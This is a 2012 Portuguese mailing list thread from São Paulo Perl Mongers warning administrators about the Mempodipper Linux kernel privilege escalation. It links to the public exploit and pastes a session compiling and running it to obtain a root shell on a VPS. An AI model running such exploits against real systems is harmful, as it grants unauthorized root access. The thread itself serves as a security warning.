[SP-pm] [OFF] Linux Kernel Privilege Escalation >= 2.6.39

Alexei Znamensky russoz at gmail.com
Fri Jan 27 06:12:34 PST 2012 

Em

Linux alexeiz 2.6.38-13-generic-pae #53-Ubuntu SMP Mon Nov 28 19:41:58 UTC
2011 i686 i686 i386 GNU/Linux

nem compila.

Eu uso muito VMWare, e o suporte aos VMTools e aos módulos que compilam no
kernel do Linux para o kernel 3.0 está quebrado (tem uns patches por aí,
mas eu não vou compilar kernel agora), então estou usando o 2.6.38 por
enquanto.

[]s,
Russian

2012/1/27 Daniel Mantovani <daniel.oliveira.mantovani em gmail.com>

> Acabei de testar na minha vps,
>
>
> mantovani em mantovanilabs:~$ gcc mempodipper.c
> mantovani em mantovanilabs:~$ ls
> a.out  apps  mempodipper.c  Perl  perl5
> mantovani em mantovanilabs:~$ chmod +x a.out
> mantovani em mantovanilabs:~$ ./a.out
> ===============================
> =          Mempodipper        =
> =           by zx2c4          =
> =         Jan 21, 2012        =
> ===============================
>
> [+] Ptracing su to find next instruction without reading binary.
> [+] Creating ptrace pipe.
> [+] Forking ptrace child.
> [+] Waiting for ptraced child to give output on syscalls.
> [+] Ptrace_traceme'ing process.
> [+] Error message written. Single stepping to find address.
> [+] Resolved call address to 0x4020b8.
> [+] Opening socketpair.
> [+] Waiting for transferred fd in parent.
> [+] Executing child from child fork.
> [+] Opening parent mem /proc/16574/mem in child.
> [+] Sending fd 6 to parent.
> [+] Received fd at 6.
> [+] Assigning fd 6 to stderr.
> [+] Calculating su padding.
> [+] Seeking to offset 0x4020ac.
> [+] Executing su with shellcode.
> # uname -a
> Linux mantovanilabs.com 3.0.4-x86_64-linode21 #1 SMP Thu Sep 1 21:28:01
> EDT 2011 x86_64 GNU/Linux
>
>  --
> Software Engineer
> Just Another Perl Hacker
> Daniel Mantovani +5511 8538-9897
> XOXO
>
> On Jan 27, 2012, at 12:02 PM, Daniel Mantovani wrote:
>
>
> http://www.techworld.com.au/article/413300/linux_vendors_rush_patch_privilege_escalation_flaw_after_root_exploits_emerge
> o exploit, http://www.exploit-db.com/exploits/18411/
>
> Atencao administradores, o assunto 'e serio.
>
>
> --
> Software Engineer
> Just Another Perl Hacker
> Daniel Mantovani +5511 8538-9897
> XOXO
>
>
>
> =begin disclaimer
>   Sao Paulo Perl Mongers: http://sao-paulo.pm.org/
>  SaoPaulo-pm mailing list: SaoPaulo-pm em pm.org
>  L<http://mail.pm.org/mailman/listinfo/saopaulo-pm>
> =end disclaimer
>
>


-- 
Alexei "RUSSOZ" Znamensky | russoz EM gmail com | http://russoz.org
GPG fingerprint = 42AB E78C B83A AE31 7D27  1CF3 C66F B5C7 71CA 9F3C
http://www.flickr.com/photos/alexeiz | http://github.com/russoz
"I don't know... fly casual!" -- Han Solo
-------------- Pr�xima Parte ----------
Um anexo em HTML foi limpo...
URL: <http://mail.pm.org/pipermail/saopaulo-pm/attachments/20120127/4666e5d1/attachment.html>

More information about the SaoPaulo-pm mailing list